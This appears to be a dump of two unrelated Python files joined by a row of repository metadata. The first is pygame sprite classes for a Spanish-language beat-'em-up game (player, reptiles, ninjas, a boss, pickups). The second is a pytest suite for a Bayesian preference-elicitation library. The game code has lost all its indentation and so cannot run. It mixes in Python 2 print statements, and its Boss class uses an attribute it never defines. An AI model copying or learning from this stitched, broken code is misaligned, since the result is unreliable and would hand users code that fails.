class fondo(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.image=pygame.image.load("stage11.png")
self.rect=self.image.get_rect()
self.rect.x=0
self.rect.y=-50
self.varx=0
self.vary=0
self.mov=True
def update(self):
self.rect.x=self.rect.x-self.varx
self.rect.y=self.rect.y+self.vary
def movefondo(self):
self.rect.x=self.rect.x-self.varx
class jugador(pygame.sprite.Sprite):
def __init__(self, matriz):
pygame.sprite.Sprite.__init__(self)
self.m=matriz
self.image=self.m[0][0]
self.rect=self.image.get_rect()
self.varx=0
self.vary=0
self.j=0
self.rect.x=300
self.rect.y=250
self.salud=100
self.accion=0
self.puntaje=0
self.dir=True
self.mov=False
self.c=0
self.cambiodir=0
self.flag=True
self.Tmuerte=5
self.Tesperar=10
self.sonido=pygame.mixer.Sound('golpes2.mp3')
self.Tiempo=120
def update(self):
if self.dir:
self.accion=self.accion
else:
if self.flag:
self.accion=self.accion+self.cambiodir
self.flag=False
self.rect.x=self.rect.x+self.varx
self.rect.y=self.rect.y+self.vary
self.image=self.m[self.accion][self.j]
self.j+=1
if self.j>=len(self.m[self.accion]):
self.j=0
if self.dir:
if not (self.accion==0) and self.mov:
self.accion=0
self.varx=0
else:
if not (self.accion==8) and self.mov:
self.accion=8
self.varx=0
if self.salud<=0:
self.Tmuerte-=1
if self.Tesperar>0:
self.Tesperar-=1
if self.Tesperar==0:
self.Tiempo-=1
self.Tesperar=10
class barravida_enemigo(pygame.sprite.Sprite):
def __init__ (self, vector, pos):
pygame.sprite.Sprite.__init__(self)
self.v=vector
self.image=self.v[0][0]
self.rect=self.image.get_rect()
self.i=0
self.varx=0
self.rect.midbottom=pos
def update(self, pos):
self.rect.midbottom=pos
def comoloquierollamar(self):
self.i+=1
if self.i>=4:
self.i=4
self.image=self.v[0][self.i]
class Reptil2(pygame.sprite.Sprite):
def __init__(self, matriz):
pygame.sprite.Sprite.__init__(self)
self.f=matriz
self.image=self.f[0][0]
self.rect=self.image.get_rect()
self.indice=0
self.rect.x=900
self.rect.y=500
self.accion=0
self.dir = 'R'
self._health = 100
self.finished = False
self.canDie = False
self.prevkey = None
self.vel_y = 0
self.vel_x = 0
self.vel_x_value = 10
self.vel_y_value = 6
self.moverange = 50
self.movetime = random.randrange(0,100)
def getHealth(self):
return self._health
def getSlope(self, posJugador):
point1 = [self.rect.x, self.rect.y]
if self.rect.x == posJugador[0]:
return False
m = float(posJugador[1] - point1[1])/(posJugador[0] - point1[0])
b = posJugador[1] - m*posJugador[0]
return [m, b]
def isAttacking(self):
if self.prevkey in ['AL', 'AR']:
return True
else:
return False
def AImove(self, jugador1, jugador2 = None, noplayers = 1):
if self.accion not in[6,7]:
self.movetime -= 1
if self.movetime <= -50:
self.movetime = random.randrange(0,50)
self.move('I')
if self.movetime <= 0:
if noplayers == 1:
selectplayer = jugador1
else:
distanceplayer1 = math.fabs(jugador1.rect.x-self.rect.x)+math.fabs(jugador1.rect.y-self.rect.y)
distanceplayer2 = math.fabs(jugador2.rect.x-self.rect.x)+math.fabs(jugador2.rect.y-self.rect.y)
if distanceplayer1 > distanceplayer2:
selectplayer = jugador2
else:
selectplayer = jugador1
if math.fabs(selectplayer.rect.x - self.rect.x) <= self.moverange and math.fabs(selectplayer.rect.y- self.rect.y) <= self.moverange/4:
if selectplayer.rect.x - self.rect.x > 0:
self.move('AR')
else:
self.move('AL')
else:
movedir = random.randrange(0,2)
discardedy = False
if movedir:
if selectplayer.rect.y - self.rect.y > self.moverange/4:
self.vel_y = self.vel_y_value
if selectplayer.rect.x - self.rect.x > 0:
self.move('R')
else:
self.move('L')
elif selectplayer.rect.y - self.rect.y < -self.moverange/4:
self.vel_y = -self.vel_y_value
if selectplayer.rect.x - self.rect.x > 0:
self.move('R')
else:
self.move('L')
else:
discardedy = True
elif discardedy or movedir == 0:
if selectplayer.rect.x - self.rect.x > self.moverange:
self.vel_x = self.vel_x_value
if selectplayer.rect.x - self.rect.x > 0:
self.move('R')
else:
self.move('L')
elif selectplayer.rect.x - self.rect.x < -self.moverange:
self.vel_x = -self.vel_x_value
if selectplayer.rect.x - self.rect.x > 0:
self.move('R')
else:
self.move('L')
random.seed(pygame.time.get_ticks())
def die(self):
if not self.accion in [6,7]:
if self.dir=='R' or self.move=='R' or self.move=='AR' or self.move=='I':
self.accion=6
self.finished = False
elif self.dir=='L' or self.move=='L' or self.move=='AL':
self.accion=7
self.finished = False
else:
pass
def move(self, key):
if (self.finished and self.prevkey in ['AL', 'AR']) or self.prevkey not in ['AL', 'AR'] :
self.finished = False
if key == 'R':
self.accion = 2
elif key == 'L':
self.accion = 3
elif key == 'AR':
self.accion = 4
elif key == 'AL':
self.accion = 5
elif key == 'I':
self.accion = 0
self.prevkey = key
self.indice = 0
def update(self):
#Idle R
if self.accion==0:
self.image = self.f[self.accion][self.indice]
self.indice += 1
if self.indice >= 4:
self.indice=0
self.vel_x = 0
self.vel_y = 0
#Idle L
if self.accion==1:
self.image = self.f[self.accion][self.indice]
self.indice += 1
if self.indice >= 4:
self.finished = True
self.indice=0
self.vel_x = 0
self.vel_y = 0
#Walk R
if self.accion==2:
if self.indice <=5:
self.image = self.f[self.accion][self.indice]
'''
if self.indice==0:
stepE.play()
if self.indice==3:
stepE.play()
'''
self.indice += 1
#Es 7 normalmente
if self.indice > 5:
self.finished = True
self.indice=0
#Walk L
if self.accion==3:
if self.indice <=5:
self.image = self.f[self.accion][self.indice]
'''
if self.indice==0:
stepE.play()
if self.indice==3:
stepE.play()
'''
self.indice += 1
#Es 7 normalmente
if self.indice > 5:
self.finished = True
self.indice=0
#1
#Attack R
if self.accion==4:
#if self.indice <=1:
self.image = self.f[self.accion][self.indice]
if self.indice==1:
bite.play()
self.indice += 1
if self.indice >=4:
self.finished = True
self.indice=0
self.vel_x = 0
self.vel_y = 0
#Attack L
if self.accion==5:
#if self.indice <=1:
self.image = self.f[self.accion][self.indice]
if self.indice==1:
bite.play()
self.indice += 1
if self.indice >=4:
self.finished = True
self.indice=0
self.vel_x = 0
self.vel_y = 0
#Die R
if self.accion==6:
if self.indice <2:
if self.indice==0:
channel6.play(cry)
self.image = self.f[self.accion][self.indice]
self.indice += 1
if self.indice >= 2:
self.indice = 0
self.finished = True
self.vel_x = 0
self.vel_y = 0
#Die L
if self.accion==7:
if self.indice <=2:
if self.indice==0:
channel6.play(cry)
self.image = self.f[self.accion][self.indice]
self.indice += 1
if self.indice >= 2:
self.indice = 0
self.finished = True
if self.accion in [6,7] and self.finished:
self.canDie = True
self.vel_x = 0
self.vel_y = 0
self.rect.y += self.vel_y
self.rect.x += self.vel_x
#if self.rect.x + self.rect.width > RESOLUTION[0] - bglimit:
# self.rect.x = RESOLUTION[0] - bglimit - self.rect.width
#elif self.rect.x < bglimit:
# self.rect.x = bglimit
class reptiles(pygame.sprite.Sprite):
def __init__(self, matriz, pos):
pygame.sprite.Sprite.__init__(self)
self.m=matriz
self.image=self.m[0][0]
self.rect=self.image.get_rect()
self.rect.x=pos[0]
self.rect.y=pos[1]
self.varx=0
self.vary=0
self.distancia=0
self.i=0
self.golpe=False
self.accion=0
self.mov=True
#self.barra=barravida_enemigo(vector, self.rect.midtop)
#groupbarras.add(self.barra)
self.derecha=True
self.izquierda=False
self.Tespera=random.randrange(100,200)
self.donacion=random.randrange(-5,10)
self._health = 100
self.Tmuerte=5
'''
self.f=matriz
self.image=self.f[0][0]
self.rect=self.image.get_rect()
self.indice=0
self.rect.x=900
self.rect.y=500
self.accion=0
self.dir = 'R'
self._health = 100
self.finished = False
self.canDie = False
self.prevkey = None
self.vel_y = 0
self.vel_x = 0
self.vel_x_value = 10
self.vel_y_value = 6
self.moverange = 50
self.movetime = random.randrange(0,100)
'''
def update(self):
self.rect.x=self.rect.x+self.varx
self.rect.y=self.rect.y+self.vary
#self.barra.update(self.rect.midtop)
self.image=self.m[self.accion][self.i]
self.i+=1
if(self.Tespera>0):
self.Tespera-=1
if self.i>=len(self.m[self.accion]):
self.i=0
if self.derecha:
self.i=0
self.accion=0
self.varx=0
if self.izquierda:
self.i=0
self.accion=5
self.varx=0
if self._health<=0:
self.Tmuerte-=1
def left(self):
self.izquierda=True
self.derecha=False
self.accion=6
self.varx=-10
def right(self):
self.derecha=True
self.izquierda=False
self.accion=1
self.varx=10
def golpear(self):
if self.derecha:
if(self.Tespera<=0):
self.accion=2
self.golpe=True
self.Tespera=random.randrange(100,200)
self.varx=0
self.i=0
if self.izquierda:
if(self.Tespera<=0):
self.accion=7
self.golpe=True
self.Tespera=random.randrange(100,200)
self.varx=0
self.i=0
channel6 = pygame.mixer.Channel(5)
def recortarBoss(archivo):
fondo=pygame.image.load(archivo)
infoFondo=fondo.get_rect()
matriz=[]
idleR=[]
idleL=[]
walkR=[]
walkL=[]
attack1R=[]
attack1L=[]
dieR=[]
dieL=[]
idle=[[5, 51, 228, 174], [280, 51, 228, 174], [552, 51, 228, 174], [825, 51, 228, 174], [1091, 51, 228, 174]]
walkRight=[[0, 321, 228, 174] , [294, 321, 228, 174] , [554, 321, 228, 174] , [816, 321, 228, 174] , [1092, 321, 228, 174] ,[1362, 321, 228, 174] ]
attack1=[[0,605,228,180], [282,554,228,227], [535,554,228,227], [820,554,228,227], [1108,605,192,180]]
die=[[262, 111, 55, 57], [328, 111, 67, 57], [404, 11 ,74, 57]] #el tamaño del boss es de 90x90
#Idle R-L
for x in range(5):
cuadro=fondo.subsurface(idle[x])
#cuadro=pygame.transform.scale(cuadro, (100, 125))
cuadro2=pygame.transform.flip(cuadro, True, False)
#cuadro2=pygame.transform.scale(cuadro2, (100, 125))
idleR.append(cuadro)
idleL.append(cuadro2)
#Walk R-L
for x in range(6):
cuadro=fondo.subsurface(walkRight[x])
#cuadro=pygame.transform.scale(cuadro, (100, 125))
cuadro2=pygame.transform.flip(cuadro, True, False)
#cuadro2=pygame.transform.scale(cuadro2, (100, 125))
walkR.append(cuadro)
walkL.append(cuadro2)
#Attack 1 R-L
for x in range(5):
cuadro=fondo.subsurface(attack1[x])
#cuadro=pygame.transform.scale(cuadro, (100, 125))
cuadro2=pygame.transform.flip(cuadro, True, False)
#cuadro2=pygame.transform.scale(cuadro2, (100, 125))
attack1R.append(cuadro)
attack1L.append(cuadro2)
#Die 1 R-L
for x in range(3):
cuadro=fondo.subsurface(die[x])
#cuadro=pygame.transform.scale(cuadro, (100, 125))
cuadro2=pygame.transform.flip(cuadro, True, False)
#cuadro2=pygame.transform.scale(cuadro2, (100, 125))
dieR.append(cuadro)
dieL.append(cuadro2)
return idleR, idleL, walkR, walkL, attack1R, attack1L, dieR, dieL
class Boss(pygame.sprite.Sprite):
def __init__(self, matriz, pos):
pygame.sprite.Sprite.__init__(self)
self.m=matriz
self.image=self.m[0][0]
self.rect=self.image.get_rect()
self._health = 100
self.rect.x=pos[0]
self.rect.y=pos[1]
self.varx=0
self.vary=0
self.distancia=0
self.i=0
self.golpe=False
self.golpekatana=False
self.golpeshuriken=False
self.accion=0
self.mov=True
self.derecha=True
self.izquierda=False
self.Tespera=random.randrange(100,200)
self.Tesperakatana=random.randrange(300,350)
self.Tesperashuriken=random.randrange(400,450)
self.salud=100
self.Tmuerte=5
def update(self):
self.rect.x=self.rect.x+self.varx
self.rect.y=self.rect.y+self.vary
self.barra.update(self.rect.midtop)
self.image=self.m[self.accion][self.i]
self.i+=1
if(self.Tespera>0):
self.Tespera-=1
if self.i>=len(self.m[self.accion]):
self.i=0
if self.derecha:
self.i=0
self.accion=0
self.varx=0
if self.izquierda:
self.i=0
self.accion=9
self.varx=0
if self.salud<=0:
self.Tmuerte-=1
def left(self):
self.izquierda=True
self.derecha=False
self.accion=6
self.varx=-10
def right(self):
self.derecha=True
self.izquierda=False
self.accion=1
self.varx=10
def golpear(self):
if self.derecha:
if(self.Tespera<=0):
self.accion=3
self.golpe=True
self.Tespera=random.randrange(100,200)
self.varx=0
self.i=0
if self.izquierda:
if(self.Tespera<=0):
self.accion=12
self.golpe=True
self.Tespera=random.randrange(100,200)
self.varx=0
self.i=0
def acercar(self):
if self.derecha:
if(self.Tespera<=0):
self.accion=2
self.varx=10
self.i=0
if self.izquierda:
if(self.Tespera<=0):
self.accion=11
self.varx=-10
self.i=0
def correr(self):
if self.derecha:
if(self.Tespera<=0):
self.accion=5
self.varx=20
self.i=0
if self.izquierda:
if(self.Tespera<=0):
self.accion=14
self.varx=-20
self.i=0
"""def salto(self):
if self.derecha:
if(self.Tespera<=0):
self.accion=6
#self.golpe=True
#self.Tespera=random.randrange(100,200)
self.varx=0
self.i=0
if self.izquierda:
if(self.Tespera<=0):
self.accion=15
#self.golpe=True
#self.Tespera=random.randrange(100,200)
self.varx=0 #las acciones son en base a los sprites del boss y pues asi yo manejaba la derecha e izquierda
#si algo lo acomodan a como uds lo hacen... alejo para que acomode el salto tal como el wolverine
self.i=0"""
def ataquekatana(self):
if self.derecha:
if(self.Tesperakatana<=0):
self.accion=7
self.golpekatana=True
self.Tesperakatana=random.randrange(100,200)
self.varx=0
self.i=0
if self.izquierda:
if(self.Tesperakatana<=0):
self.accion=16
self.golpekatana=True
self.Tesperakatana=random.randrange(100,200)
self.varx=0
self.i=0
def lanzashuriken(self):
if self.derecha:
if(self.Tesperashuriken<=0):
self.accion=1
self.golpeshuriken=True
self.Tesperashuriken=random.randrange(100,200)
self.varx=0
self.i=0
if self.izquierda:
if(self.Tesperashuriken<=0):
self.accion=10
self.golpeshuriken=True
self.Tesperashuriken=random.randrange(100,200)
self.varx=0
self.i=0
class ninjas(pygame.sprite.Sprite):
def __init__(self, matriz, groupbarras, vector, pos):
pygame.sprite.Sprite.__init__(self)
self.m=matriz
self.image=self.m[0][0]
self.rect=self.image.get_rect()
self.rect.x=pos[0]
self.rect.y=pos[1]
self.varx=0
self.vary=0
self.distancia=0
self.i=0
self.golpe=False
self.accion=0
self.mov=True
self.barra=barravida_enemigo(vector, self.rect.midtop)
groupbarras.add(self.barra)
self.derecha=True
self.izquierda=False
self.Tespera=random.randrange(300,400)
self.donacion=random.randrange(-10,10)
self.salud=100
self.Tmuerte= 5
def update(self):
self.rect.x=self.rect.x+self.varx
self.rect.y=self.rect.y+self.vary
print self.accion, self.i, 'ninjas'
self.image=self.m[self.accion][self.i]
self.barra.update(self.rect.midtop)
self.i+=1
if(self.Tespera>0):
self.Tespera-=1
if self.i>=len(self.m[self.accion]):
self.i=0
if self.derecha:
self.i=0
self.accion=0
self.varx=0
if self.izquierda:
self.i=0
self.accion=5
self.varx=0
if self.salud<=0:
self.Tmuerte-=1
def left(self):
self.izquierda=True
self.derecha=False
self.accion=6
self.varx=-10
def right(self):
self.izquierda=False
self.accion=1
self.derecha=True
self.varx=10
def golpear(self):
if self.derecha:
if(self.Tespera<=0):
self.i=0
self.accion=4
self.golpe=True
self.Tespera=random.randrange(300,400)
self.varx=0
if self.izquierda:
if(self.Tespera<=0):
self.i=0
self.accion=9
self.golpe=True
self.Tespera=random.randrange(300,400)
self.varx=0
class enemigas(pygame.sprite.Sprite):
def __init__(self, matriz, groupbarras, vector, pos):
pygame.sprite.Sprite.__init__(self)
self.m=matriz
self.image=self.m[0][0]
self.rect=self.image.get_rect()
self.rect.x=pos[0]
self.rect.y=pos[1]
self.varx=0
self.vary=0
self.distancia=0
self.i=0
self.golpe=False
self.accion=0
self.mov=True
self.barra=barravida_enemigo(vector, self.rect.midtop)
groupbarras.add(self.barra)
self.derecha=True
self.izquierda=False
self.Tespera=random.randrange(300,400)
self.donacion=random.randrange(-10,10)
self.salud=100
self.Tmuerte=5
def update(self):
self.rect.x=self.rect.x+self.varx
self.rect.y=self.rect.y+self.vary
self.barra.update(self.rect.midtop)
print self.accion, self.i
self.image=self.m[self.accion][self.i]
self.i+=1
if(self.Tespera>0):
self.Tespera-=1
if self.i>=len(self.m[self.accion]):
self.i=0
if self.derecha:
self.i=0
self.accion=0
self.varx=0
if self.izquierda:
self.i=0
self.accion=4
self.varx=0
if self.salud<=0:
self.Tmuerte-=1
def left(self):
self.izquierda=True
self.derecha=False
self.accion=5
self.varx=-10
def right(self):
self.izquierda=False
self.accion=1
self.derecha=True
self.varx=10
def golpear(self):
if self.derecha:
if(self.Tespera<=0):
self.i=0
self.accion=2
self.golpe=True
self.Tespera=random.randrange(300,400)
self.varx=0
if self.izquierda:
if(self.Tespera<=0):
self.i=0
self.accion=6
self.golpe=True
self.Tespera=random.randrange(300,400)
self.varx=0
"""class colega(pygame.sprite.Sprite):
def __init__(self, matriz):
pygame.sprite.Sprite.__init__(self)
self.m=matriz
self.image=self.m[0][0]
self.rect=self.image.get_rect()
self.rect.x=50
self.rect.y=350
self.varx=0
self.vary=0
self.distancia=0
self.i=0
self.golpe=False
self.accion=0
self.mov=True
self.derecha=True
self.izquierda=False
self.Tespera=random.randrange(0,40)
self.salud=100
self.Tmuerte=5
def update(self):
self.rect.x=self.rect.x+self.varx
self.rect.y=self.rect.y+self.vary
self.image=self.m[self.accion][self.i]
self.i+=1
if(self.Tespera>0):
self.Tespera-=1
if self.i>=len(self.m[self.accion]):
self.i=0
if self.derecha:
self.i=0
self.accion=0
self.varx=0
if self.izquierda:
self.i=0
self.accion=5
self.varx=0
if self.salud<=0:
self.Tmuerte-=1
def left(self):
self.izquierda=True
self.derecha=False
self.accion=10
self.varx=-10
def right(self):
self.derecha=True
self.izquierda=False
self.accion=2
self.varx=10
def golpear(self):
if self.derecha:
if(self.Tespera<=0):
self.golpe=True
self.accion=4
self.Tespera=random.randrange(0,40)
self.varx=0
self.i=0
if self.izquierda:
if(self.Tespera<=0):
self.golpe=True
self.accion=12
self.Tespera=random.randrange(0,40)
self.varx=0
self.i=0
def patada(self):
if self.golpe:
if self.derecha:
if(self.Tespera<=0):
self.golpe=True
self.accion=5
self.Tespera=random.randrange(0,40)
self.varx=0
self.i=0
if self.izquierda:
if(self.Tespera<=0):
self.golpe=True
self.accion=13
self.Tespera=random.randrange(0,40)
self.varx=0
self.i=0
self.golpe=False
"""
class helado(pygame.sprite.Sprite):
def __init__ (self,pos):
pygame.sprite.Sprite.__init__(self)
self.image=pygame.image.load("helado2.png")
self.rect=self.image.get_rect()
self.rect.x=pos[0]
self.rect.y=pos[1]
self.Ttime=100
self.id=1
self.sonido=pygame.mixer.Sound('obtencion.ogg')
self.varx=0
def update(self):
if self.Ttime>0:
self.Ttime-=1
self.rect.x=self.rect.x+self.varx
def desplazar(self):
self.varx=-10
class pastel(pygame.sprite.Sprite):
def __init__ (self,pos):
pygame.sprite.Sprite.__init__(self)
self.image=pygame.image.load("pastel.png")
self.rect=self.image.get_rect()
self.rect.x=pos[0]
self.rect.y=pos[1]
self.Ttime=100
self.id=0
self.sonido=pygame.mixer.Sound('obtencion.ogg')
self.varx=0
def update(self):
if self.Ttime>0:
self.Ttime-=1
self.rect.x=self.rect.x+self.varx
def desplazar(self):
self.varx=-10
class golosina(pygame.sprite.Sprite):
def __init__ (self,pos):
pygame.sprite.Sprite.__init__(self)
self.image=pygame.image.load("golosina.png")
self.rect=self.image.get_rect()
self.rect.x=pos[0]
self.rect.y=pos[1]
self.Ttime=100
self.id=0
self.varx=0
self.sonido=pygame.mixer.Sound('obtencion.ogg')
def update(self):
if self.Ttime>0:
self.Ttime-=1
self.rect.x=self.rect.x+self.varx
def desplazar(self):
self.varx=-10
class fuego(pygame.sprite.Sprite):
def __init__ (self, matriz):
pygame.sprite.Sprite.__init__(self)
self.m=matriz
self.image=self.m[0][0]
self.rect=self.image.get_rect()
self.i=0
self.rect.x=self.rect.x+300
self.rect.y=self.rect.y-30
self.retardo=20
def update(self):
if self.retardo<=0:
self.i+=1
if self.i<9:
self.image=self.m[0][self.i]
else:
self.i=0
self.image=self.m[0][0]
self.retardo=20
else:
self.retardo-=1
class barravida_jugador(pygame.sprite.Sprite):
def __init__ (self, vector):
pygame.sprite.Sprite.__init__(self)
self.v=vector
self.image=self.v[0][0]
self.rect=self.image.get_rect()
self.i=0
self.rect.x=100
self.rect.y=30
def update(self):
pass
| 29.138813 | 151 | 0.506472 | 4,000 | 31,907 | 3.98975 | 0.07 | 0.051695 | 0.030453 | 0.023623 | 0.822733 | 0.79723 | 0.770098 | 0.752867 | 0.747415 | 0.738016 | 0 | 0.06478 | 0.374432 | 31,907 | 1,094 | 152 | 29.165448 | 0.73477 | 0 | 0 | 0.769032 | 0 | 0 | 0.005968 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.002581 | 0.003871 | null | null | 0.002581 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d6c6898d438a296c5d87fd9f16db91a2e73da10e | 10,644 | py | Python | tests/test_elicitation.py | jimparr19/pypbl | 888cc7e0aa20a30a318479a5ef1c93d5944f10f5 | [
"MIT"
] | 1 | 2020-09-23T05:07:01.000Z | 2020-09-23T05:07:01.000Z | tests/test_elicitation.py | jimparr19/pypbl | 888cc7e0aa20a30a318479a5ef1c93d5944f10f5 | [
"MIT"
] | null | null | null | tests/test_elicitation.py | jimparr19/pypbl | 888cc7e0aa20a30a318479a5ef1c93d5944f10f5 | [
"MIT"
] | 2 | 2020-11-18T03:14:47.000Z | 2021-06-22T21:05:52.000Z | import pytest
import numpy as np
import pandas as pd
from pypbl.elicitation import BayesPreference
from pypbl.priors import Normal, Exponential
@pytest.fixture
def basic_model():
data = pd.DataFrame({'x': [1, 0, 1], 'y': [0, 1, 1]}, index=['item 0', 'item 1', 'item 2'])
model = BayesPreference(data=data)
return model
def test_set_priors(basic_model):
assert basic_model.priors is None
basic_model.set_priors([Normal(), Normal()])
for prior in basic_model.priors:
assert isinstance(prior, Normal)
def test_incorrect_set_priors(basic_model):
assert basic_model.priors is None
with pytest.raises(AttributeError):
basic_model.set_priors([Normal()])
def test_set_strict_preference(basic_model):
assert len(basic_model.strict_preferences) == 0
basic_model.add_strict_preference('item 0', 'item 1')
assert len(basic_model.strict_preferences) == 1
def test_set_strict_preference_invalid_items(basic_model):
with pytest.raises(ValueError):
basic_model.add_strict_preference(0, 1)
def test_set_indifferent_preference(basic_model):
assert len(basic_model.indifferent_preferences) == 0
basic_model.add_indifferent_preference('item 0', 'item 1')
assert len(basic_model.indifferent_preferences) == 1
def test_set_invalid_preference_invalid_items(basic_model):
with pytest.raises(ValueError):
basic_model.add_indifferent_preference(0, 1)
def test_remove_last_strict_preference(basic_model):
assert len(basic_model.strict_preferences) == 0
basic_model.add_strict_preference('item 0', 'item 1')
assert len(basic_model.strict_preferences) == 1
basic_model.remove_last_strict_preference()
assert len(basic_model.strict_preferences) == 0
def test_strict_log_probability(basic_model):
basic_model.set_priors([Normal(1, 0.5), Exponential(0.5)])
x = np.array([1.0, 0.5])
assert basic_model.strict_log_probability(('item 0', 'item 1'), x) == pytest.approx(-0.1413058, 0.001)
assert basic_model.strict_log_probability(('item 1', 'item 0'), x) == pytest.approx(-2.026650, 0.001)
def test_indifferent_log_probability(basic_model):
basic_model.set_priors([Normal(1, 0.5), Exponential(0.5)])
x = np.array([1.0, 0.5])
assert basic_model.indifferent_log_probability(('item 0', 'item 1'), x) == pytest.approx(-0.7188213, 0.001)
def test_log_probability(basic_model):
basic_model.set_priors([Normal(1, 0.5), Exponential(0.5)])
x = np.array([1.0, 0.5])
assert basic_model.log_probability(x) == basic_model.priors[0](x[0]) + basic_model.priors[1](x[1])
def test_negative_log_probability(basic_model):
basic_model.set_priors([Normal(1, 0.5), Exponential(0.5)])
x = np.array([1.0, 0.5])
assert basic_model.negative_log_probability(x) == - basic_model.log_probability(x)
def test_probability(basic_model):
basic_model.set_priors([Normal(1, 0.5), Exponential(0.5)])
x = np.array([1.0, 0.5])
assert basic_model.probability(x) == np.exp(basic_model.log_probability(x))
def test_inference_raises_error(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 1')
with pytest.raises(ValueError):
basic_model.infer_weights(method='test')
def test_inference_with_normal_priors(basic_model):
basic_model.set_priors([Normal(1, 0.5), Normal(2, 0.5)])
assert basic_model.weights is None
basic_model.infer_weights()
assert all(a - b < 1e-4 for a, b in zip(basic_model.weights.tolist(), [1, 2]))
def test_inference_with_normal_priors_parsing_method(basic_model):
basic_model.set_priors([Normal(1, 0.5), Normal(2, 0.5)])
assert basic_model.weights is None
basic_model.infer_weights(method='MAP')
assert all(a - b < 1e-4 for a, b in zip(basic_model.weights.tolist(), [1, 2]))
def test_inference_with_normal_priors_parsing_mean_method(basic_model):
basic_model.set_priors([Normal(1, 0.5), Normal(2, 0.5)])
assert basic_model.weights is None
basic_model.infer_weights(method='mean', iterations=500)
assert all(a - b < 0.5 for a, b in zip(basic_model.weights.tolist(), [1, 2]))
def test_inference_with_different_priors(basic_model):
basic_model.set_priors([Normal(1, 1), Exponential(-0.5)])
assert basic_model.weights is None
with pytest.warns(UserWarning):
basic_model.infer_weights()
assert all(a - b < 1e-4 for a, b in zip(basic_model.weights.tolist(), [1, 0]))
def test_inference_with_strict_preferences(basic_model):
basic_model.set_priors([Normal(0, 1), Normal(0, 1)])
basic_model.add_strict_preference('item 0', 'item 2')
assert basic_model.weights is None
basic_model.infer_weights()
assert basic_model.weights is not None
assert basic_model.weights[0] > basic_model.weights[1]
basic_model.add_strict_preference('item 1', 'item 2')
basic_model.infer_weights()
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.infer_weights()
assert basic_model.weights[0] > basic_model.weights[1]
def test_inference_with_indifferent_preferences(basic_model):
basic_model.set_priors([Normal(0, 1), Normal(0, 1)])
basic_model.add_indifferent_preference('item 0', 'item 2')
basic_model.infer_weights()
assert basic_model.weights[0] == basic_model.weights[1]
basic_model.add_indifferent_preference('item 1', 'item 2')
basic_model.infer_weights()
assert basic_model.weights[0] == basic_model.weights[1]
def test_inference_with_strict_and_indifferent_preferences(basic_model):
basic_model.set_priors([Normal(0, 1), Normal(0, 1)])
basic_model.add_strict_preference('item 0', 'item 2')
assert basic_model.weights is None
basic_model.infer_weights()
assert basic_model.weights is not None
assert basic_model.weights[0] > basic_model.weights[1]
basic_model.add_strict_preference('item 1', 'item 2')
basic_model.infer_weights()
assert basic_model.weights[0] == basic_model.weights[1]
basic_model.add_indifferent_preference('item 0', 'item 1')
basic_model.infer_weights()
assert basic_model.weights[0] == basic_model.weights[1]
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.infer_weights()
assert basic_model.weights[0] > basic_model.weights[1]
def test_inference_with_strict_and_indifferent_preferences_with_mean_method(basic_model):
basic_model.set_priors([Normal(0, 1), Normal(0, 1)])
basic_model.add_strict_preference('item 0', 'item 2')
basic_model.add_strict_preference('item 1', 'item 2')
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.infer_weights(method='mean')
assert basic_model.weights[0] > basic_model.weights[1]
def test_suggest_new_pair_random_method(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 2')
basic_model.add_strict_preference('item 1', 'item 2')
basic_model.infer_weights()
new_pair = basic_model.suggest_new_pair(method='random')
for item in new_pair:
assert item in ['item 0', 'item 1']
def test_suggest_random_method(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.infer_weights()
pair = basic_model.suggest(method='random')
assert 'item 0' in pair
def test_suggest_new_pair_entropy_method(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 2')
basic_model.add_strict_preference('item 1', 'item 2')
basic_model.infer_weights()
new_pair = basic_model.suggest_new_pair(method='min_entropy')
for item in new_pair:
assert item in ['item 0', 'item 1']
def test_suggest_entropy_method(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.infer_weights()
pair = basic_model.suggest(method='min_entropy')
assert 'item 0' in pair
def test_suggest_variance_method(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.infer_weights()
pair = basic_model.suggest(method='max_variance')
assert 'item 0' in pair
def test_suggest_all_suggested_pairs(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.add_strict_preference('item 0', 'item 2')
basic_model.infer_weights()
with pytest.warns(UserWarning):
pair = basic_model.suggest()
assert 'item 0' not in pair
def test_suggest_raises_error(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.add_strict_preference('item 0', 'item 2')
with pytest.raises(ValueError):
basic_model.suggest(method='test')
with pytest.raises(ValueError):
basic_model.suggest_new_pair(method='test')
def test_rank(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 2', 'item 0')
basic_model.add_strict_preference('item 2', 'item 1')
basic_model.add_strict_preference('item 1', 'item 0')
basic_model.infer_weights()
rank = basic_model.rank()
assert rank.index[0] == 'item 2'
assert rank.index[1] == 'item 1'
assert rank.index[2] == 'item 0'
def test_rank_automatic_inference(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 2', 'item 0')
basic_model.add_strict_preference('item 2', 'item 1')
basic_model.add_strict_preference('item 1', 'item 0')
rank = basic_model.rank()
assert rank.index[0] == 'item 2'
assert rank.index[1] == 'item 1'
assert rank.index[2] == 'item 0'
def test_compute_entropy(basic_model):
basic_model.set_priors([Normal(), Normal()])
basic_model.add_strict_preference('item 0', 'item 1')
basic_model.infer_weights()
low_entropy = basic_model.compute_entropy(['item 0', 'item 2'])
